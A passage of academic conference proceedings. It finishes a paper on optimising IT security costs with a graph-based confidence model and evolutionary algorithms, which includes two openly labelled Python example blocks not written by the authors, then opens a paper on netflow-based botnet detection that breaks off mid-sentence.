Figure 5: Representation of a parallel system of n components<br />
Reliability engineers are trained to work with parallel systems using block concepts:<br />
RS = 1 − Π(1 − Ri) = 1 − (1 − R1) × (1 − R2) × ... × (1 − Rn), if the component reliabilities differ, or<br />
RS = 1 − (1 − R)^n, if all n components are identical [Ri = R; i = 1, ..., n].<br />
A set of n blocks connected in parallel can be replaced with a single block with the reliability/confidence RS/CS.<br />
By recursively replacing the series and parallel subsystems by single equivalent elements we can obtain the reliability/confidence RS/CS for the entire graph/system.<br />
5.1.4 Specifics of GS graph-based model confidence calculations<br />
In the GSM only the so-called must-be boxes are serial, and the logic "if any one of the system components fails, the entire system fails" is exact and perfect for them.<br />
With parallel components the situation is a bit more complicated. For fully redundant security activities (for example, HW and Redundant HW) the principle "as long as not all of the system components fail, the entire system works" is exact, but if we have a must-be security activity area in parallel with activity areas that only try to improve the must-be activity's Confidence (for example HW and Logging/Monitoring), then we do not have a fully redundant situation, and we must bring in a Redundancy Coefficient RC.<br />
Practically RC ranges from 1 to 0.1: for full redundancy RC = 1, and an area parallel to a must-be activity with a redundancy of less than 0.1 is pointless.<br />
If for full redundancy<br />
C = 1 − (1 − C1_mb)·(1 − C2) = C1_mb + C2·(1 − C1_mb),<br />
then bringing in the Redundancy Coefficient RC for not-fully-redundant parallel situations gives<br />
C = 1 − (1 − C1_mb)·(1 − RC·C2), or C = C1_mb + RC·C2·(1 − C1_mb).<br />
By recursively replacing the series (must-be) and parallel subsystems by single equivalent elements we can obtain the reliability/confidence RS/CS for the entire graph/system, and the new graph model gives us the possibility to calculate for IT managers/decision makers the most needed/wanted reliability of a specific IT security system (also often called Confidence) and the Security Efficiency (SE), whose value can be expressed as<br />
SE = IT-risks / Real Losses = 1 / (1 − CS).<br />
For example, in Figure 6 SE is given as a function of the costs of IT security activities and measures.<br />
Figure 6: SE = f(costs)<br />
6. Evolutionary algorithms<br />
Evolutionary algorithms are based on the Darwinian natural selection process and form a class of population-based stochastic search algorithms (Dracopoulos, 2008; Eiben & Smith, 2003; Holland, 1975). The view that random variation provides the mechanism for discovering new solutions (Michalewicz & Fogel, 2004) was inspired by the process of natural evolution. The idea of using Darwinian principles of evolution to solve combinatorial optimization problems arose with the invention of electronic computers. Now there is a wide variety of approaches that can be described as belonging to the field of evolutionary computing. The algorithms used in the field are termed evolutionary algorithms (Dracopoulos, 2008).<br />
The most important characteristics of evolutionary algorithms are as follows:<br />
- Each candidate solution to the optimization problem is represented as an individual. The set of individuals is called a population.<br />
- The quality of a candidate solution is measured by a fitness function. Fitter solutions have a higher probability to survive and to contribute their characteristics to the offspring (next generation).<br />
- Variation operators (e.g., crossover, mutation) are applied to the individuals and modify the population of solutions dynamically.<br />
- The average fitness improves over time as a selection mechanism is applied and the fittest individuals are selected for the next generation (survival of the fittest).<br />
The basis of an evolutionary algorithm is simple. First, a population of initial candidate solutions is generated randomly. Thereafter, iteratively, a number of variation operators are applied and the fittest individuals are selected for the new generations.<br />
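The series/parallel confidence reduction of 5.1.2-5.1.4 (with the redundancy coefficient RC), SE = 1/(1 − CS), and the evolutionary loop just described, as one added example that is not the authors' code: the area data, the graph and the multi-branch generalisation of the RC formula are constructed assumptions, a brute-force search is included for comparison on this small case, and the default population and generation sizes follow the paper's meta-level result.

```python
"""Graded-security graph model plus an evolutionary optimiser (constructed
example, not the paper's bank model).  Level 0 of an area means "not
implemented" (confidence 0), so a must-be area at level 0 zeroes the chain."""
import itertools
import random

# Constructed data: area -> list of (cost, confidence) indexed by level.
AREAS = {
    "People":      [(0, 0.0), (10, 0.80), (25, 0.95)],
    "HW":          [(0, 0.0), (20, 0.90), (40, 0.97)],
    "RedundantHW": [(0, 0.0), (30, 0.90), (60, 0.97)],
    "Monitoring":  [(0, 0.0), (5, 0.50), (15, 0.80)],
    "AntiMalware": [(0, 0.0), (8, 0.85), (20, 0.95)],
}
# Constructed graph: ("area", name) is a leaf, ("series", [...]) a must-be
# chain, ("parallel", [(node, rc), ...]) redundancy with coefficient rc per
# branch (assumption: with more than two branches the (1 - rc_j * C_j)
# factors multiply).  Monitoring only partly backs up HW, hence rc = 0.5.
GRAPH = ("series", [
    ("area", "People"),
    ("parallel", [(("area", "HW"), 1.0), (("area", "RedundantHW"), 1.0),
                  (("area", "Monitoring"), 0.5)]),
    ("area", "AntiMalware"),
])

def graph_confidence(node, levels, areas=AREAS):
    """Recursively reduce series/parallel sub-graphs to one confidence C_S."""
    kind, body = node
    if kind == "area":
        return areas[body][levels[body]][1]
    if kind == "series":                     # R_S = R_1 * R_2 * ... * R_n
        c = 1.0
        for child in body:
            c *= graph_confidence(child, levels, areas)
        return c
    if kind == "parallel":                   # C = 1 - prod(1 - rc_j * C_j)
        fail = 1.0
        for child, rc in body:
            fail *= 1.0 - rc * graph_confidence(child, levels, areas)
        return 1.0 - fail
    raise ValueError(f"unknown node kind {kind!r}")

def total_cost(levels, areas=AREAS):
    return sum(areas[a][lvl][0] for a, lvl in levels.items())

def security_efficiency(confidence):
    """SE = 1 / (1 - C_S); unbounded once confidence reaches 1."""
    return float("inf") if confidence >= 1.0 else 1.0 / (1.0 - confidence)

def brute_force(graph, areas, budget):
    """Exhaustive search (k^n points per budget); feasible only for tiny n."""
    names, best = list(areas), (None, -1.0)
    for combo in itertools.product(*(range(len(areas[a])) for a in names)):
        levels = dict(zip(names, combo))
        if total_cost(levels, areas) <= budget:
            c = graph_confidence(graph, levels, areas)
            if c > best[1]:
                best = (levels, c)
    return best

def evolve(graph, areas, budget, n_pop=None, n_gen=None, repeats=3,
           tournament=3, p_mut=0.1, seed=0):
    """Maximise confidence within budget with a generational EA.  Defaults use
    the paper's meta-level result: population 3n, 4n generations, 3 repeats."""
    rng, names = random.Random(seed), list(areas)
    n_pop, n_gen = n_pop or 3 * len(names), n_gen or 4 * len(names)

    def fitness(ind):
        levels = dict(zip(names, ind))
        if total_cost(levels, areas) > budget:
            return -1.0                      # infeasible: never preferred
        return graph_confidence(graph, levels, areas)

    def pick(pop):                           # tournament selection
        return max(rng.sample(pop, tournament), key=fitness)

    best, best_fit = None, -2.0
    for _ in range(repeats):                 # each repeat restarts from scratch
        pop = [tuple(rng.randrange(len(areas[a])) for a in names)
               for _ in range(n_pop)]
        for _ in range(n_gen):
            children = [max(pop, key=fitness)]        # elitism keeps the best
            while len(children) < n_pop:
                p1, p2 = pick(pop), pick(pop)
                child = [g1 if rng.random() < 0.5 else g2   # uniform crossover
                         for g1, g2 in zip(p1, p2)]
                for i, a in enumerate(names):             # per-gene mutation
                    if rng.random() < p_mut:
                        child[i] = rng.randrange(len(areas[a]))
                children.append(tuple(child))
            pop = children
        cand = max(pop, key=fitness)
        if fitness(cand) > best_fit:
            best, best_fit = cand, fitness(cand)
    return dict(zip(names, best)), best_fit

if __name__ == "__main__":                   # one optimisation per budget point
    for budget in (40, 60, 80, 100):
        levels, c = evolve(GRAPH, AREAS, budget)
        print(budget, total_cost(levels), round(c, 4), round(security_efficiency(c), 2))
```

Running the main block prints one Pareto point per budget; on this five-area case the brute-force optimum is cheap to compute and can be used to check the evolutionary result.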
6.1 Meta-level optimization of evolutionary algorithms<br />
The aim of this work is to optimize the parameters of an evolutionary algorithm. As the optimization process is based on randomness, the speed of the problem-solving task is rather variable. There are no hard and fast rules for choosing appropriate values for the parameters (Cicirello & Smith, 2000). The first scientist who put considerable effort into finding parameter values was De Jong (1975). He tested different values experimentally and concluded that the following parameters give reasonable performance for his test functions: population size 50, crossover 0.6 and mutation rate 0.001 (see also Eiben, Hinterding, & Michalewicz, 1999 for details). But those values are suitable for the problem that he had at hand. It has been shown that it is not possible to find parameter values that are optimal for all problem domains (Wolpert & Macready, 1997); therefore each problem needs its own approach and a different set of parameters.<br />
A widely practised approach to identify a good set of parameters for a particular class of problem is through experimentation, using trial and error. As the evolutionary approach itself is mostly based on trial and error to move through the search space, it is reasonable to use the evolutionary algorithm itself to optimize its parameters; such an approach is called meta-level optimization (Cicirello & Smith, 2000). The main weakness of this approach is that it is computationally expensive and takes a lot of time.<br />
There are two ways to improve the performance of the evolutionary algorithm. The strategy can be either static or adaptive (Aine, Kumar, & Chakrabarti, 2006). In the static framework, the parameter values are decided at the start of the algorithm and the decision is not revised during runtime. The static model works well when there is little or no uncertainty about the progress of the algorithm. For algorithms where the progress is not predictable and different parameter settings are suitable at different stages, a dynamic monitoring-based strategy is preferred. In the dynamic case, the control decision is updated during runtime by monitoring the progress of the algorithm for a particular run. As the IT security cost optimization task is rather stable and does not include many uncertainties, we decided to find a static set of parameters rather than develop a dynamic framework for parameter changes.<br />
6.1.1 Meta-level optimization set-up<br />
An <strong>in</strong>dividual <strong>in</strong> the optimization task was represented as a vector consist<strong>in</strong>g of 10 elements. The<br />
elements represented the adjustable set of parameters: Repeat – how many times to repeat optimization<br />
process, Population – population size, Tournament – tournament size (number of <strong>in</strong>dividuals <strong>in</strong> a subset),<br />
Generations – a predef<strong>in</strong>ed number of generations, Crossover – probability of apply<strong>in</strong>g crossover<br />
operator (value 0.49 means that <strong>in</strong> 49% cases the crossover occurs), Mutate – probability of mutation,<br />
Swap – probability of swapp<strong>in</strong>g, Inversion – probability of <strong>in</strong>version, Insertion – probability of <strong>in</strong>sertion,<br />
180
Jüri Kivimaa and Toomas Kirt<br />
and Displacement – probability of displacement. During the meta-level optimization process a candidate<br />
solution was optimized based on these parameters.<br />
An important question was how to measure the fitness of the meta-level evolutionary optimization. We<br />
had two optimization goals: first, to find the maximum level of confidence and second, to find it as fast as<br />
possible. Therefore we had to combine the measures of confidence and time. As each optimization was<br />
repeated r times, the value of the meta-level fitness function F was calculated as the average of the fitness of the original<br />
task minus time:<br />
F = Σ (c_i – t_i) / r<br />
where c_i is the confidence level and t_i is the calculation time in seconds of the i-th experiment (see the curve in<br />
Figure 7).<br />
6.1.2 Results of meta-level optimization<br />
We performed experiments with the data (Figure 1) consisting of 33 security activity areas. From the<br />
original data we formed 6 sets consisting of 13, 17, 21, 25, 29 and 33 areas. The parameters for the meta-level<br />
optimizer were as follows: population size 75, tournament size 15, number of generations<br />
75, crossover rate 0.9 and mutation rate 0.7.<br />
The optimization process took almost two and a half days. As can be seen on the detailed graph (Figure<br />
7), the fine tuning of the meta-level optimization took some time to find the optimal level.<br />
Figure 7: The fitness value of the meta-level optimization task (upper part of the fitness curve)<br />
Average results of the optimization process are given in Table 1.<br />
Table 1: Average values of parameters as a result of meta-level optimization<br />
No Pop Tournament Generations Crossover Mutation Swap Inversion Insertion Displacement<br />
13 28.86 41.43 42.86 0.82 0.7 0.58 0.19 0.15 0.15<br />
17 35.57 69.14 67.43 0.85 0.89 0.63 0.14 0.16 0.12<br />
21 46.57 40.71 70.71 0.8 0.88 0.53 0.1 0.13 0.12<br />
25 43.43 31.86 95.86 0.85 0.77 0.61 0.08 0.13 0.15<br />
29 48.86 65.29 92.43 0.8 0.89 0.74 0.07 0.1 0.16<br />
33 61.43 37.71 96.43 0.91 0.74 0.72 0.13 0.06 0.13<br />
When we calculated the correlation coefficients (Table 2) we could see that there is a strong linear correlation<br />
between the number of security activity areas (the size of the task) and both the number of individuals in a<br />
population (r=0.95) and the number of generations (r=0.92). There is also a positive correlation between<br />
the size of the task and the crossover probability (0.45). For most of the other probability values the correlation is<br />
negative.<br />
Table 2: Correlation coefficients of all 35 selected results<br />
No Pop. Tourn. Gen. Crossover Mutate Swap Inversion Insertion Displace.<br />
No 1 0.95 -0.13 0.92 0.45 0.06 0.73 -0.64 -0.92 0.16<br />
Population 0.95 1 -0.21 0.82 0.48 0.08 0.57 -0.53 -0.93 -0.12<br />
Tournament -0.13 -0.21 1 -0.1 -0.29 0.7 0.37 -0.06 0.24 -0.04<br />
Generations 0.92 0.82 -0.1 1 0.4 0.18 0.62 -0.8 -0.71 0.16<br />
Crossover 0.45 0.48 -0.29 0.4 1 -0.47 0.4 0.2 -0.51 -0.28<br />
Mutate 0.06 0.08 0.7 0.18 -0.47 1 0.05 -0.56 0.18 -0.3<br />
Swap 0.73 0.57 0.37 0.62 0.4 0.05 1 -0.29 -0.7 0.38<br />
Inversion -0.64 -0.53 -0.06 -0.8 0.2 -0.56 -0.29 1 0.33 -0.21<br />
Insertion -0.92 -0.93 0.24 -0.71 -0.51 0.18 -0.7 0.33 1 -0.12<br />
Displacement 0.16 -0.12 -0.04 0.16 -0.28 -0.3 0.38 -0.21 -0.12 1<br />
In Figure 8 we can see that the probability values of the variation operators Crossover, Mutation and<br />
Swap were quite high, while the others' values were rather small and even diminished as the problem<br />
grew. Probably their computational cost was relatively high compared to the gain in fitness.<br />
Figure 8: Change of probability of variation operators<br />
In Figure 9 we can see that there is a clear linear relation between the problem size and the population<br />
size and the number of generations.<br />
Figure 9: Distribution of population and generation values and their mean value (line)<br />
Based on the measurements we were able to generate formulas to specify the parameters of the<br />
evolutionary optimizer. We added the standard deviation to the mean value (μ + σ) to get a rough<br />
estimate for the population-related values (e.g., based on the mean value of Generations / Number of<br />
security activity areas μ = 3.429 and standard deviation σ = 0.5688, we can calculate the coefficient 3.429 +<br />
0.5688 ≈ 4). The results could be as follows:<br />
repeat 3<br />
population size N * 3<br />
tournament size 50<br />
generations N * 4<br />
where N is the number of security activity areas, as the number of security levels is 4.<br />
As there was a tendency to move closer to certain values we decided to use in further optimizations the<br />
following parameter set for variation operators:<br />
crossover rate 0.9<br />
mutation rate 0.8<br />
swap rate 0.6<br />
inversion rate 0.1<br />
insertion rate 0.07<br />
displacement rate 0.11<br />
As we can predict the optimal population-related parameters and have also identified optimal values for the<br />
operator probabilities, we can estimate the optimization time and perform optimization tasks much<br />
faster.<br />
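The parameter set derived above, together with the meta-level fitness F = Σ(c_i – t_i) / r from section 6.1.1, applied in a small tournament-selection GA over a vector of N security levels; this is an added example, not the authors' optimizer. The six variation operators use their standard GA definitions (assumed, since the paper only names them), the per-level cost and confidence tables and the budget are constructed, and the tournament size is clamped to the population size when the derived value 50 exceeds it.

```python
import random

LEVELS = 4  # the paper states four security levels per area; encoded here as 0..3

def parameters_for(n_areas):
    """Parameter set from section 6.1.2: population N*3, generations N*4,
    repeat 3, tournament 50 and the fixed variation-operator rates."""
    return {"repeat": 3, "population": n_areas * 3, "tournament": 50,
            "generations": n_areas * 4, "crossover": 0.9, "mutate": 0.8,
            "swap": 0.6, "inversion": 0.1, "insertion": 0.07, "displacement": 0.11}

def meta_fitness(confidences, times):
    """Meta-level fitness F = sum(c_i - t_i) / r over r repeated runs (section 6.1.1)."""
    return sum(c - t for c, t in zip(confidences, times)) / len(confidences)

# Variation operators on an individual (list of N levels). Standard GA definitions
# are assumed here; the paper only names the operators.
def crossover(a, b, point):            # one-point crossover at index `point`
    return a[:point] + b[point:], b[:point] + a[point:]

def mutate(ind, i, level):             # reset gene i to `level`
    out = list(ind); out[i] = level; return out

def swap(ind, i, j):                   # exchange genes i and j
    out = list(ind); out[i], out[j] = out[j], out[i]; return out

def inversion(ind, i, j):              # reverse the segment ind[i:j]
    return ind[:i] + ind[i:j][::-1] + ind[j:]

def insertion(ind, i, j):              # move gene i to position j
    out = list(ind); out.insert(j, out.pop(i)); return out

def displacement(ind, i, j, k):        # cut segment ind[i:j], re-insert it at position k
    seg, rest = ind[i:j], ind[:i] + ind[j:]
    return rest[:k] + seg + rest[k:]

# Constructed toy objective (NOT the paper's cost model): each level has a cost
# and a confidence value; maximise total confidence within a budget.
COST = [0, 1, 2, 4]
CONF = [0.0, 0.5, 0.8, 0.95]

def fitness(ind, budget):
    cost = sum(COST[g] for g in ind)
    conf = sum(CONF[g] for g in ind)
    return conf - max(0, cost - budget)   # linear penalty when over budget

def vary(ind, p, rng):
    """Apply each operator with its configured probability."""
    n = len(ind)
    if rng.random() < p["mutate"]:
        ind = mutate(ind, rng.randrange(n), rng.randrange(LEVELS))
    if rng.random() < p["swap"]:
        ind = swap(ind, rng.randrange(n), rng.randrange(n))
    if n > 1 and rng.random() < p["inversion"]:
        i, j = sorted(rng.sample(range(n + 1), 2)); ind = inversion(ind, i, j)
    if rng.random() < p["insertion"]:
        ind = insertion(ind, rng.randrange(n), rng.randrange(n))
    if n > 1 and rng.random() < p["displacement"]:
        i, j = sorted(rng.sample(range(n + 1), 2))
        ind = displacement(ind, i, j, rng.randrange(n - (j - i) + 1))
    return ind

def evolve(n_areas, budget, seed=0):
    """One run of the GA with the derived parameters; returns the best individual."""
    rng = random.Random(seed)
    p = parameters_for(n_areas)
    k = min(p["tournament"], p["population"])   # assumption: clamp so sampling works
    pop = [[rng.randrange(LEVELS) for _ in range(n_areas)] for _ in range(p["population"])]

    def score(x):
        return fitness(x, budget)

    def select():                       # tournament selection over k individuals
        return max(rng.sample(pop, k), key=score)

    best = max(pop, key=score)
    for _ in range(p["generations"]):
        nxt = []
        while len(nxt) < len(pop):
            a, b = select(), select()
            if n_areas > 1 and rng.random() < p["crossover"]:
                a, b = crossover(a, b, rng.randrange(1, n_areas))
            nxt += [vary(a, p, rng), vary(b, p, rng)]
        pop = nxt[:len(pop)]
        best = max([best] + pop, key=score)   # keep the best solution seen so far
    return best

if __name__ == "__main__":
    n = 13
    print(parameters_for(n))
    runs = [evolve(n, budget=2 * n, seed=s) for s in range(parameters_for(n)["repeat"])]
    print([round(fitness(r, 2 * n), 2) for r in runs])
```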
7. Conclusions<br />
We have performed an analysis to identify linear coefficients for estimating the parameter values of the<br />
evolutionary algorithm. As a result we have found a way to calculate the values for population size and the<br />
number of generations based on the problem size, and have also identified an optimal parameter set for the<br />
variation operators. This makes the use of the evolutionary algorithm more efficient and enables us to increase<br />
the optimization speed. As there are certain restrictions related to the other optimization techniques, the<br />
evolutionary approach also enables us to enhance the IT security methodology, and a new graph-based<br />
model is proposed.<br />
But wider application of the graph-based model will depend on the availability of expert knowledge or<br />
statistics that link costs and security confidence values to the security measures. This expert data will<br />
depend on the type of infrastructure where information must be protected, which differs between<br />
countries and economic areas. The only realistic solution is an expert system that can be adjusted by<br />
experts to suit concrete situations. Therefore some further work is needed to enhance the model and<br />
provide appropriate expert knowledge to make the model more accurate.<br />
References<br />
Aine, S., Kumar, R., and Chakrabarti, P.P. (2006) “Adaptive Parameter Control of Evolutionary Algorithms Under<br />
Time Constraints”, in A. Tiwari, J. Knowles, E. Avineri, K. Dahal, and R. Roy (Eds.), Applications of Soft<br />
Computing, Berlin, Springer, pp. 373–382.<br />
Cicirello, V. A., and Smith, S. F. (2000) “Modeling GA performance for control parameter optimization”, in D. Whitley,<br />
D. Goldberg, E. Cantú-Paz, L. Spector, I. Parmee, and H. Beyer (Eds.), GECCO-2000: Proceedings of the<br />
Genetic and Evolutionary Computation Conference, Las Vegas, NV, pp. 235–242.<br />
De Jong, K. (1975) “The analysis of the behavior of a class of genetic adaptive systems”, Ph.D. dissertation,<br />
Department of Computer Science, University of Michigan, Ann Arbor, MI.<br />
DOE (1999) Classified Information Systems Security Manual. Retrieved February 1, 2010, from<br />
https://www.directives.doe.gov/directives/archive-directives/471.2-DManual-2/at_download/file.<br />
Dracopoulos, D. C. (2008) “Evolutionary Learning”, in B. Wah (Ed.), Wiley Encyclopedia of Computer Science and<br />
Engineering, New York, John Wiley and Sons.<br />
Eiben, A. E., Hinterding, R., and Michalewicz, Z. (1999) “Parameter control in evolutionary algorithms”, IEEE<br />
Transactions on Evolutionary Computation, Vol 3, No. 2, pp. 124–141.<br />
Eiben, A. E., and Smith, J. E. (2003) Introduction to Evolutionary Computing, Berlin, Springer.<br />
Holland, J. H. (1975) Adaptation in Natural and Artificial Systems: An Introductory Analysis with Applications to<br />
Biology, Control, and Artificial Intelligence, Cambridge, MA, MIT Press.<br />
ISACA (2009) “An Introduction to the Business Model for Information Security”, ISACA.<br />
Kirt, T., and Kivimaa, J. (2010) “Optimizing IT security costs by evolutionary algorithms”, in C. Czosseck and K.<br />
Podins (Eds.), Conference on Cyber Conflict Proceedings 2010, Tallinn, Estonia, Cooperative Cyber Defence<br />
Centre of Excellence Publications, pp. 145–160.<br />
Kivimaa, J. (2009) “Applying a costs optimizing model for IT security”, in H. Santos (Ed.), Proceedings of the 8th<br />
European Conference on Information Warfare and Security, Reading, UK, Academic Publishing Limited, pp.<br />
142–153.<br />
Kivimaa, J., Ojamaa, A., and Tyugu, E. (2009) “Graded security expert system”, in CRITIS 2008: Third International<br />
Workshop on Critical Information Infrastructure Security, Rome, Springer.<br />
Michalewicz, Z., and Fogel, D. B. (2004) How To Solve It: Modern Heuristics, Berlin, Springer.<br />
NISPOM (2006) “National Industrial Security Program Operating Manual”, U.S. Department of Defense.<br />
Ojamaa, A., Tyugu, E., and Kivimaa, J. (2008) “Pareto-optimal situation analysis for selection of security measures”,<br />
in Military Communications Conference MILCOM 2008: Unclassified Proceedings, Piscataway, NJ, IEEE, pp.<br />
3224–3230.<br />
Wolpert, D., and Macready, W. G. (1997) “No free lunch theorems for optimization”, IEEE Transactions on<br />
Evolutionary Computation, Vol 1, No. 1, pp. 67–82.<br />
Botnet Detection: A Numerical and Heuristic Analysis<br />
Luís Mendonça and Henrique Santos<br />
Universidade do Minho, Braga, Portugal<br />
mendonca.luis@gmail.com<br />
hsantos@dsi.uminho.pt<br />
Abstract: Internet cyber criminality has changed its ways since the old days when attacks were largely motivated by<br />
recognition and glory. A new era of cyber criminals is on the move. Real armies of robots (bots) swarm the internet<br />
perpetrating precise, objective and coordinated attacks on individuals and organizations. Many of these bots are now<br />
coordinated by real cybercrime organizations in an almost open-source driven development, which results in the<br />
proliferation of many bot variants with refined capabilities and increased detection complexity. Economic and<br />
reputational damage is difficult to quantify but the scale is widening. It is up to one’s own imagination to figure out<br />
how much was lost in April of 2007 when Estonia suffered the well known distributed attack on its countrywide internet<br />
infrastructure. Among the techniques available to mitigate this threat, botnet detection emerges as a relevant<br />
solution. This technology has also evolved in recent years but it is still far from a definitive solution. New techniques,<br />
constantly appearing in areas such as host infection, deployment, maintenance, control and dissimulation of bots, are<br />
constantly changing the detection vectors thought out and developed. Therefore, research and implementation of<br />
anomaly-based botnet detection systems is fundamental to pinpoint and track the continuously changing botnets and<br />
clones, which are impossible to identify by simple signature-based systems. This paper presents the studies and<br />
tests made to define an effective set of traffic parameters capable of modeling both normal and abnormal activity of<br />
networks, focusing on botnet activity detection through behavior, numerical and heuristic modeling. Different types of<br />
botnets (IRC, P2P, HTTP, fast-flux among others) are initially analyzed, followed by the study of some existing<br />
detection techniques and tools like Honeynet, BotSniffer and BotMiner. Following this initial study, numerical and<br />
heuristic aspects of both normal and bot traffic are investigated. Finally, a set of traffic parameters is proposed aiming at<br />
fast and precise botnet detection, with a low false positive rate.<br />
Keywords: Botnet detection, anomaly-based, heuristics, numerical, behavior<br />
1. Introduction<br />
Internet security has been targeted in innumerable ways over the years. Concerning attack tools,<br />
the combination of many well known techniques has been making botnets an untraceable, effective,<br />
dynamic and powerful means to perpetrate all kinds of malicious activities such as Distributed Denial of<br />
Service (DDoS) attacks, espionage, email spam, malware spreading, data theft, click and identity fraud,<br />
among others (Mielke & H. Chen 2008).<br />
The detection of bots (sometimes called zombies or drones when referring to the infected machines) and<br />
botnets becomes critical, and can be made using three distinct methodologies: cooperative behavior<br />
analysis, signature analysis and attack behavior analysis (Bailey et al. 2009). This paper will focus on the<br />
first two approaches, bearing in mind that botnet detection should be time-efficient (Jing et al. 2009).<br />
Objectively, this paper intends to contribute to botnet detection and tracking by analyzing network<br />
behavior alone. The advantage of such an approach is its relative simplicity and possible operation in a network<br />
core, ideally with no packet and no host-based inspection. Either centralized or decentralized botnets<br />
can be detected using such an approach, though distinct traffic features must be considered for each<br />
topology.<br />
The remainder of this paper is organized as follows: in section 2 we present some of the work done on<br />
anomaly-based botnet detection and characterization. In section 3 we analyze several possible network<br />
metrics and correlations, bearing in mind fast and precise botnet detection. Section 4 describes the<br />
research patterns followed, along with the tools used and already developed to support the analysis<br />
framework created. Also in this section, tests and corresponding results on some anomaly detection<br />
vectors are analyzed in order to propose a detection model. A conclusion is then presented along with<br />
a discussion of this model’s possible detection difficulties and ways to improve it.<br />
2. Related work<br />
The analysis of botnet network behavior is a relatively recent research area but has already produced<br />
some interesting and coherent results. Some of this research is presented next.<br />
BotHunter (Guofei Gu et al. 2007) tracks communication flows between internal and external hosts,<br />
correlating them to IDS events in order to effectively detect internal host malware infections.<br />
185
Luís Mendonça and Henrique Santos<br />
BotSniffer (G. Gu, Zhang, et al. 2008) uses statistical algorithms to analyze topology-centric botnets and<br />
detect their hosts' crowd-like behaviors. BotSniffer's work was complemented with BotMiner (G. Gu,<br />
Perdisci, et al. 2008), where a correlation between C&C (Command and Control) communication and<br />
the corresponding malicious activity is also established.<br />
In (Akiyama 2007) three metrics are proposed to detect botnet cooperative behavior: relationship,<br />
response and synchronization. On the other hand, Strayer manages to establish a correlation between<br />
inter-arrival time and packet size (Strayer et al. 2008).<br />
BotCop (W. Lu & Tavallaee 2009) analyses the temporal-frequent characteristics of flows to differentiate<br />
the malicious communication traffic created by bots from normal traffic generated by human beings. The<br />
work done in (Karasaridis et al. 2007) contributes to botnet detection research by establishing a<br />
distance metric between a pre-defined IRC botnet traffic model and passively collected network traffic<br />
(flows).<br />
However, distinct approaches from the aforementioned botnet detection vectors exist: DNS traffic<br />
analysis is one of them. This detection vector was explored in (Villamarin-Salomón & Brustoloni 2008),<br />
(Morales et al. 2010), (Choi et al. 2007) and by BotXRayer (I. Kim et al. 2009).<br />
Another important area of botnet detection research is botnet measuring and characterization. In (Dagon<br />
& G. Gu 2007) the authors made an important contribution to this research by presenting a model for<br />
botnet operation and size estimation. On the characterization side, honeynets and honeypots keep the<br />
lead in the bot hijacking processes, allowing researchers to deeply study bot code and modus operandi.<br />
3. Botnet anomaly-based detection<br />
Any bot master needs to control his army of bots in some way. Thus, a command and control (C&C)<br />
channel needs to be established in order to instruct the bots in their actions (scan, recruit, upgrade,<br />
attack and others). C&C channels can be created using either centralized (IRC or HTTP) or decentralized<br />
(P2P, unstructured or fast-flux networks) architectures (Zhu et al. 2008). In (Dagon & G. Gu 2007) it is<br />
confirmed that C&C is often the weak link of a botnet, although C&C-oriented botnet disruption wouldn’t<br />
always be the best approach.<br />
Although the use of known and stable C&C channels is still preferred by botmasters on the basis of<br />
stability, new types of C&C channels are constantly being implemented in order to evade existing<br />
detection techniques. The use of Twitter servers and RSS feed services are some examples (Estrada &<br />
Nakao 2010). Any new type of C&C will be invisible to simple comparisons with pre-determined models of<br />
botnet operation. The use of behavior analysis and correlation is, therefore, fundamental to correctly<br />
identify such dynamic and dissimulated botnets.<br />
There are many traffic data sources that can be used to detect anomalous network usage and botnet<br />
activity. Among these we can find DNS Data, Netflow Data, Packet Tap Data, Address Allocation Data,<br />
Honeypot Data and Host Data (Bailey et al. 2009).<br />
In order to allow the proposed system to operate in large networks, this analysis will focus on the study of<br />
netflows, as this kind of data is simpler and faster to process than the other types mentioned. Honeypot Data<br />
and Packet Tap Data require heavier and slower processing, while Host Data analysis falls into the<br />
category of anti-virus protection systems. Furthermore, many supervised networks already implement<br />
netflow logging, which could, in turn, contribute to an easier implementation of the proposed detection<br />
system. The use of netflows is also welcome when dealing with traffic privacy issues. The major<br />
drawback of this approach is the loss of some traffic characterization details.<br />
Several botnet features can be used in order to determine bot-related anomalous network activities:<br />
relationship, response and synchronization are some of them. Correlations can be established between<br />
these features by analyzing all visible hosts’ activity in a pre-determined period, and can be established in<br />
both vertical and horizontal vectors.<br />
Vertical correlation uses the information captured from one single host's activities in order to identify its<br />
botnet membership and malicious intents. Horizontal correlation, on the other hand, exploits the<br />
synchronized behavior of several hosts belonging to the same botnet (Estrada & Nakao 2010). Vertical<br />
correlations can be established, in theory, through the detection of anomalous responses to known<br />
request/response pairs. Though feasible, used alone this method can be very sensitive and prone<br />
to produce a high false positive rate.<br />
Many flow-based correlations can be established, such as the number of bytes and packets per host, port<br />
and flow; the number of different IPs and ports contacted by a host; and the host’s flow interval and<br />
duration. These correlations are able to identify network scans and flash-crowd behaviors as well as other<br />
anomalous network events.<br />
The netflow analysis method proposed in this paper is similar to systems like BotMiner and<br />
BotSniffer, but its time-efficiency goal really differentiates it from the others.<br />
While the BotMiner and BotSniffer algorithms focus mainly on the attack phase, this approach starts its<br />
detection analysis in the initial host infection and bot scanning phases.<br />
Similarly to other botnet detection systems, the goal of the proposed analysis is not the detection of<br />
single infected hosts but the detection of specific global network anomalies that can lead to the<br />
identification of coordinated hosts’ activity relating to botnet operation.<br />
4. Behavior analysis, experimental setup and results<br />
This section presents the current bot and botnet behaviors under analysis and the corresponding<br />
measurable characteristics that are capable of botnet activity detection. Some of the proposed heuristics<br />
are then tested using the developed analysis framework. A detection model is then presented.<br />
4.1 Bot Behavior<br />
In order to recruit more bots for a botnet, every zombie scans the network looking for vulnerable hosts<br />
suitable for malware installation. This behavior should be the first one to produce clear evidence of possible<br />
bot activity and is independent of botnet type (HTTP, IRC, P2P, or other).<br />
Normally, scan activity targets few ports within a specific host, always having in mind specific<br />
vulnerabilities. HTTP servers, for example, normally respond to HTTP, HTTPS and, possibly, FTP<br />
requests (three ports). Other much stealthier types of scanning can be found on the internet. The<br />
verification of single port connectivity on specific and targeted hosts (using a list shared by bots) is one<br />
possibility among many others. Thus, scanning activity can be detected by monitoring host port and IP<br />
connection rates.<br />
Other ways of distinguishing bot activity from normal network use involve the study of automated bot<br />
behavior. Bot C&C connections are normally established at a fixed time rate (W. Lu & Tavallaee<br />
2009). Though some bots can make their C&C connections randomly, this can reduce the response time of<br />
the botnet. Fixed time connection rates can be detected by analyzing the temporal characteristics of<br />
netflows, for example.<br />
Another characteristic of automated bot behavior can be found in the similarity of its network flows in terms<br />
of packets’ size and count.<br />
4.2 Botnet behavior<br />
Now that some bot behaviors are defined, it is important to establish a botnet behavior model. This can<br />
be achieved by observing the holistic property of a botnet. When observed together, though<br />
